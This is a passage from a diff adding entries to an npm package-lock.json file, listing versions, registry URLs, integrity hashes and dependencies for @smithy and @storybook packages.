"resolved": "https://registry.npmjs.org/@smithy/middleware-serde/-/middleware-serde-1.0.2.tgz", + "integrity": "sha512-T4PcdMZF4xme6koUNfjmSZ1MLi7eoFeYCtodQNQpBNsS77TuJt1A6kt5kP/qxrTvfZHyFlj0AubACoaUqgzPeg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/middleware-stack": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/middleware-stack/-/middleware-stack-1.0.2.tgz", + "integrity": "sha512-H7/uAQEcmO+eDqweEFMJ5YrIpsBwmrXSP6HIIbtxKJSQpAcMGY7KrR2FZgZBi1FMnSUOh+rQrbOyj5HQmSeUBA==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/node-config-provider": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/node-config-provider/-/node-config-provider-1.0.2.tgz", + "integrity": "sha512-HU7afWpTToU0wL6KseGDR2zojeyjECQfr8LpjAIeHCYIW7r360ABFf4EaplaJRMVoC3hD9FeltgI3/NtShOqCg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/property-provider": "^1.0.2", + "@smithy/shared-ini-file-loader": "^1.0.2", + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/node-http-handler": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@smithy/node-http-handler/-/node-http-handler-1.0.3.tgz", + "integrity": "sha512-PcPUSzTbIb60VCJCiH0PU0E6bwIekttsIEf5Aoo/M0oTfiqsxHTn0Rcij6QoH6qJy6piGKXzLSegspXg5+Kq6g==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/abort-controller": "^1.0.2", + "@smithy/protocol-http": "^1.1.1", + "@smithy/querystring-builder": "^1.0.2", + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/property-provider": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/property-provider/-/property-provider-1.0.2.tgz", + "integrity": "sha512-pXDPyzKX8opzt38B205kDgaxda6LHcTfPvTYQZnwP6BAPp1o9puiCPjeUtkKck7Z6IbpXCPUmUQnzkUzWTA42Q==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/protocol-http": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@smithy/protocol-http/-/protocol-http-1.1.1.tgz", + "integrity": "sha512-mFLFa2sSvlUxm55U7B4YCIsJJIMkA6lHxwwqOaBkral1qxFz97rGffP/mmd4JDuin1EnygiO5eNJGgudiUgmDQ==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/querystring-builder": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/querystring-builder/-/querystring-builder-1.0.2.tgz", + "integrity": "sha512-6P/xANWrtJhMzTPUR87AbXwSBuz1SDHIfL44TFd/GT3hj6rA+IEv7rftEpPjayUiWRocaNnrCPLvmP31mobOyA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "@smithy/util-uri-escape": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/querystring-parser": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/querystring-parser/-/querystring-parser-1.0.2.tgz", + "integrity": "sha512-IWxwxjn+KHWRRRB+K2Ngl+plTwo2WSgc2w+DvLy0DQZJh9UGOpw40d6q97/63GBlXIt4TEt5NbcFrO30CKlrsA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/service-error-classification": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@smithy/service-error-classification/-/service-error-classification-1.0.3.tgz", + "integrity": "sha512-2eglIYqrtcUnuI71yweu7rSfCgt6kVvRVf0C72VUqrd0LrV1M0BM0eYN+nitp2CHPSdmMI96pi+dU9U/UqAMSA==", + "optional": true, + "peer": true, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/shared-ini-file-loader": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/shared-ini-file-loader/-/shared-ini-file-loader-1.0.2.tgz", + "integrity": "sha512-bdQj95VN+lCXki+P3EsDyrkpeLn8xDYiOISBGnUG/AGPYJXN8dmp4EhRRR7XOoLoSs8anZHR4UcGEOzFv2jwGw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/signature-v4": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/signature-v4/-/signature-v4-1.0.2.tgz", + "integrity": "sha512-rpKUhmCuPmpV5dloUkOb9w1oBnJatvKQEjIHGmkjRGZnC3437MTdzWej9TxkagcZ8NRRJavYnEUixzxM1amFig==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/eventstream-codec": "^1.0.2", + "@smithy/is-array-buffer": "^1.0.2", + "@smithy/types": "^1.1.1", + "@smithy/util-hex-encoding": "^1.0.2", + "@smithy/util-middleware": "^1.0.2", + "@smithy/util-uri-escape": "^1.0.2", + "@smithy/util-utf8": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/smithy-client": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@smithy/smithy-client/-/smithy-client-1.0.4.tgz", + "integrity": "sha512-gpo0Xl5Nyp9sgymEfpt7oa9P2q/GlM3VmQIdm+FeH0QEdYOQx3OtvwVmBYAMv2FIPWxkMZlsPYRTnEiBTK5TYg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/middleware-stack": "^1.0.2", + "@smithy/types": "^1.1.1", + "@smithy/util-stream": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/types": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@smithy/types/-/types-1.1.1.tgz", + "integrity": "sha512-tMpkreknl2gRrniHeBtdgQwaOlo39df8RxSrwsHVNIGXULy5XP6KqgScUw2m12D15wnJCKWxVhCX+wbrBW/y7g==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/url-parser": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/url-parser/-/url-parser-1.0.2.tgz", + "integrity": "sha512-0JRsDMQe53F6EHRWksdcavKDRjyqp8vrjakg8EcCUOa7PaFRRB1SO/xGZdzSlW1RSTWQDEksFMTCEcVEKmAoqA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/querystring-parser": "^1.0.2", + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + } + }, + "node_modules/@smithy/util-base64": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-base64/-/util-base64-1.0.2.tgz", + "integrity": "sha512-BCm15WILJ3SL93nusoxvJGMVfAMWHZhdeDZPtpAaskozuexd0eF6szdz4kbXaKp38bFCSenA6bkUHqaE3KK0dA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/util-buffer-from": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-body-length-browser": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-body-length-browser/-/util-body-length-browser-1.0.2.tgz", + "integrity": "sha512-Xh8L06H2anF5BHjSYTg8hx+Itcbf4SQZnVMl4PIkCOsKtneMJoGjPRLy17lEzfoh/GOaa0QxgCP6lRMQWzNl4w==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + } + }, + "node_modules/@smithy/util-body-length-node": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-body-length-node/-/util-body-length-node-1.0.2.tgz", + "integrity": "sha512-nXHbZsUtvZeyfL4Ceds9nmy2Uh2AhWXohG4vWHyjSdmT8cXZlJdmJgnH6SJKDjyUecbu+BpKeVvSrA4cWPSOPA==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-buffer-from": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-buffer-from/-/util-buffer-from-1.0.2.tgz", + "integrity": "sha512-lHAYIyrBO9RANrPvccnPjU03MJnWZ66wWuC5GjWWQVfsmPwU6m00aakZkzHdUT6tGCkGacXSgArP5wgTgA+oCw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/is-array-buffer": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-config-provider": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-config-provider/-/util-config-provider-1.0.2.tgz", + "integrity": "sha512-HOdmDm+3HUbuYPBABLLHtn8ittuRyy+BSjKOA169H+EMc+IozipvXDydf+gKBRAxUa4dtKQkLraypwppzi+PRw==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-defaults-mode-browser": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-browser/-/util-defaults-mode-browser-1.0.2.tgz", + "integrity": "sha512-J1u2PO235zxY7dg0+ZqaG96tFg4ehJZ7isGK1pCBEA072qxNPwIpDzUVGnLJkHZvjWEGA8rxIauDtXfB0qxeAg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/property-provider": "^1.0.2", + "@smithy/types": "^1.1.1", + "bowser": "^2.11.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/@smithy/util-defaults-mode-node": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-node/-/util-defaults-mode-node-1.0.2.tgz", + "integrity": "sha512-9/BN63rlIsFStvI+AvljMh873Xw6bbI6b19b+PVYXyycQ2DDQImWcjnzRlHW7eP65CCUNGQ6otDLNdBQCgMXqg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/config-resolver": "^1.0.2", + "@smithy/credential-provider-imds": "^1.0.2", + "@smithy/node-config-provider": "^1.0.2", + "@smithy/property-provider": "^1.0.2", + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/@smithy/util-hex-encoding": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-hex-encoding/-/util-hex-encoding-1.0.2.tgz", + "integrity": "sha512-Bxydb5rMJorMV6AuDDMOxro3BMDdIwtbQKHpwvQFASkmr52BnpDsWlxgpJi8Iq7nk1Bt4E40oE1Isy/7ubHGzg==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-middleware": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-middleware/-/util-middleware-1.0.2.tgz", + "integrity": "sha512-vtXK7GOR2BoseCX8NCGe9SaiZrm9M2lm/RVexFGyPuafTtry9Vyv7hq/vw8ifd/G/pSJ+msByfJVb1642oQHKw==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-retry": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@smithy/util-retry/-/util-retry-1.0.4.tgz", + "integrity": "sha512-RnZPVFvRoqdj2EbroDo3OsnnQU8eQ4AlnZTOGusbYKybH3269CFdrZfZJloe60AQjX7di3J6t/79PjwCLO5Khw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/service-error-classification": "^1.0.3", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">= 14.0.0" + } + }, + "node_modules/@smithy/util-stream": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-stream/-/util-stream-1.0.2.tgz", + "integrity": "sha512-qyN2M9QFMTz4UCHi6GnBfLOGYKxQZD01Ga6nzaXFFC51HP/QmArU72e4kY50Z/EtW8binPxspP2TAsGbwy9l3A==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/fetch-http-handler": "^1.0.2", + "@smithy/node-http-handler": "^1.0.3", + "@smithy/types": "^1.1.1", + "@smithy/util-base64": "^1.0.2", + "@smithy/util-buffer-from": "^1.0.2", + "@smithy/util-hex-encoding": "^1.0.2", + "@smithy/util-utf8": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-uri-escape": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-uri-escape/-/util-uri-escape-1.0.2.tgz", + "integrity": "sha512-k8C0BFNS9HpBMHSgUDnWb1JlCQcFG+PPlVBq9keP4Nfwv6a9Q0yAfASWqUCtzjuMj1hXeLhn/5ADP6JxnID1Pg==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-utf8": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-utf8/-/util-utf8-1.0.2.tgz", + "integrity": "sha512-V4cyjKfJlARui0dMBfWJMQAmJzoW77i4N3EjkH/bwnE2Ngbl4tqD2Y0C/xzpzY/J1BdxeCKxAebVFk8aFCaSCw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/util-buffer-from": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@storybook/addon-a11y": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-a11y/-/addon-a11y-8.6.4.tgz", + "integrity": "sha512-B3/d2cRlnpAlE3kh+OBaly6qrWN9DEqwDyZsNeobaiXnNp11xoHZP2OWjEwXldc0pKls41jeOksXyXrILfvTng==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/addon-highlight": "8.6.4", + "@storybook/test": "8.6.4", + "axe-core": "^4.2.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-actions": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-actions/-/addon-actions-8.6.4.tgz", + "integrity": "sha512-mCcyfkeb19fJX0dpQqqZCnWBwjVn0/27xcpR0mbm/KW2wTByU6bKFFujgrHsX3ONl97IcIaUnmwwUwBr1ebZXw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "@types/uuid": "^9.0.1", + "dequal": "^2.0.2", + "polished": "^4.2.2", + "uuid": "^9.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-actions/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "dev": true, + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@storybook/addon-backgrounds": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-backgrounds/-/addon-backgrounds-8.6.4.tgz", + "integrity": "sha512-lRYGumlYdd1RptQJvOTRMx/q2pDmg2MO5GX4la7VfI8KrUyeuC1ZOSRDEcXeTuAZWJztqmtymg6bB7cAAoxCFA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "memoizerific": "^1.11.3", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-controls": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-controls/-/addon-controls-8.6.4.tgz", + "integrity": "sha512-oMMP9Bj0RMfYmaitjFt6oBSjKH4titUqP+wE6PrZ3v+Om56f4buqfNKXRf80As2OrsZn0pjj95muWzVVHqIhyQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "dequal": "^2.0.2", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-docs": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-docs/-/addon-docs-8.6.4.tgz", + "integrity": "sha512-+kbcjvEAH0Xs+k+raAwfC0WmJilWhxBYnLLeazP3m5AkVI3sIjbzuuZ78NR0DCdRkw9BpuuXMHv5o4tIvLIUlw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@mdx-js/react": "^3.0.0", + "@storybook/blocks": "8.6.4", + "@storybook/csf-plugin": "8.6.4", + "@storybook/react-dom-shim": "8.6.4", + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-essentials": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-essentials/-/addon-essentials-8.6.4.tgz", + "integrity": "sha512-3pF0ZDl5EICqe0eOupPQq6PxeupwkLsfTWANuuJUYTJur82kvJd3Chb7P9vqw0A0QBx6106mL6PIyjrFJJMhLg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/addon-actions": "8.6.4", + "@storybook/addon-backgrounds": "8.6.4", + "@storybook/addon-controls": "8.6.4", + "@storybook/addon-docs": "8.6.4", + "@storybook/addon-highlight": "8.6.4", + "@storybook/addon-measure": "8.6.4", + "@storybook/addon-outline": "8.6.4", + "@storybook/addon-toolbars": "8.6.4", + "@storybook/addon-viewport": "8.6.4", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-highlight": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-highlight/-/addon-highlight-8.6.4.tgz", + "integrity": "sha512-jFREXnSE/7VuBR8kbluN+DBVkMXEV7MGuCe8Ytb1/D2Q0ohgJe395dfVgEgSMXErOwsn//NV/NgJp6JNXH2DrA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-interactions": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-interactions/-/addon-interactions-8.6.4.tgz", + "integrity": "sha512-MZAAZjyvmJXCvM35zEiPpXz7vK+fimovt+WZKAMayAbXy5fT+7El0c9dDyTQ2norNKNj9QU/8hiU/1zARSUELQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "@storybook/instrumenter": "8.6.4", + "@storybook/test": "8.6.4", + "polished": "^4.2.2", + "ts-dedent": "^2.2.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-links": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-links/-/addon-links-8.6.4.tgz", + "integrity": "sha512-TaSIteYLJ12+dVBk7fW96ZvNIFizKs+Vo/YuNAe4xTzFJRrjLkFj9htLVi/dusMfn7lYo5DHIns08LuM+po1Dg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "storybook": "^8.6.4" + }, + "peerDependenciesMeta": { + "react": { + "optional": true + } + } + }, + "node_modules/@storybook/addon-measure": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-measure/-/addon-measure-8.6.4.tgz", + "integrity": "sha512-IpVL1rTy1tO8sy140eU3GdVB1QJ6J62+V6GSstcmqTLxDJQk5jFfg7hVbPEAZZ2sPFmeyceP9AMoBBo0EB355A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "tiny-invariant": "^1.3.1" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-outline": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-outline/-/addon-outline-8.6.4.tgz", + "integrity": "sha512-28nAslKTy0zWMdxAZcipMDYrEp1TkXVooAsqMGY5AMXMiORi1ObjhmjTLhVt1dXp+aDg0X+M3B6PqoingmHhqQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-styling-webpack": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@storybook/addon-styling-webpack/-/addon-styling-webpack-1.0.1.tgz", + "integrity": "sha512-5n+SXPfMTc4m7sWaJWPWjoHYWc6/B111M2Ia55toQ3GV4ON4vVlTgH9FX+EgCkDticElj99HLTMDJkHRj2yvkg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/node-logger": "^8.0.0-alpha.10" + }, + "peerDependencies": { + "webpack": "^5.0.0" + } + }, + "node_modules/@storybook/addon-toolbars": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-toolbars/-/addon-toolbars-8.6.4.tgz", + "integrity": "sha512-PU2lvgwCKDn93zpp5MEog103UUmSSugcxDf18xaoa9D15Qtr+YuQHd2hXbxA7+dnYL9lA7MLYsstfxE91ieM4Q==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-viewport": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-viewport/-/addon-viewport-8.6.4.tgz", + "integrity": "sha512-O5Ij+SRVg6grY6JOL5lOpsFyopZxuZEl2GHfh2SUf9hfowNS0QAgFpJupqXkwZzRSrlf9uKrLkjB6ulLgN2gOQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "memoizerific": "^1.11.3" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-webpack5-compiler-babel": { + "version": "3.0.5", + "resolved": "https://registry.npmjs.org/@storybook/addon-webpack5-compiler-babel/-/addon-webpack5-compiler-babel-3.0.5.tgz", + "integrity": "sha512-9dlc5PrehEFUHqkgj8x+aKtOY9XH9Zk6WBbtpgY/JCQ7waJ2VvhyDnrgJeXfek+WYlSkJElnta6SlqP+XRG0PQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.26.0", + "babel-loader": "^9.2.1" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/@storybook/blocks": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/blocks/-/blocks-8.6.4.tgz", + "integrity": "sha512-+oPXwT3KzJzsdkQuGEzBqOKTIFlb6qmlCWWbDwAnP0SEqYHoTVRTAIa44icFP0EZeIe+ypFVAm1E7kWTLmw1hQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/icons": "^1.2.12", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0", + "storybook": "^8.6.4" + }, + "peerDependenciesMeta": { + "react": { + "optional": true + }, + "react-dom": { + "optional": true + } + } + }, + "node_modules/@storybook/builder-webpack5": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/builder-webpack5/-/builder-webpack5-8.6.4.tgz", + "integrity": "sha512-6fhjt3uiBZeapRbF477bkJ+ln+yA8vOz0qR86XTq79VrYY5AbBL6F8swVMk9LG1t49vYPR/UuPjYBxsUNKK8MQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/core-webpack": "8.6.4", + "@types/semver": "^7.3.4", + "browser-assert": "^1.2.1", + "case-sensitive-paths-webpack-plugin": "^2.4.0", + "cjs-module-lexer": "^1.2.3", + "constants-browserify": "^1.0.0", + "css-loader": "^6.7.1", + "es-module-lexer": "^1.5.0", + "fork-ts-checker-webpack-plugin": "^8.0.0", + "html-webpack-plugin": "^5.5.0", + "magic-string": "^0.30.5", + "path-browserify": "^1.0.1", + "process": "^0.11.10", + "semver": "^7.3.7", + "style-loader": "^3.3.1", + "terser-webpack-plugin": "^5.3.1", + "ts-dedent": "^2.0.0", + "url": "^0.11.0", + "util": "^0.12.4", + "util-deprecate": "^1.0.2", + "webpack": "5", + "webpack-dev-middleware": "^6.1.2", + "webpack-hot-middleware": "^2.25.1", + "webpack-virtual-modules": "^0.6.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/@storybook/builder-webpack5/node_modules/punycode": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-1.4.1.tgz", + "integrity": "sha512-jmYNElW7yvO7TV33CjSmvSiE2yco3bV2czu/OzDKdMNVZQWfxCblURLhf+47syQRBntjfLdd/H0egrzIG+oaFQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@storybook/builder-webpack5/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": 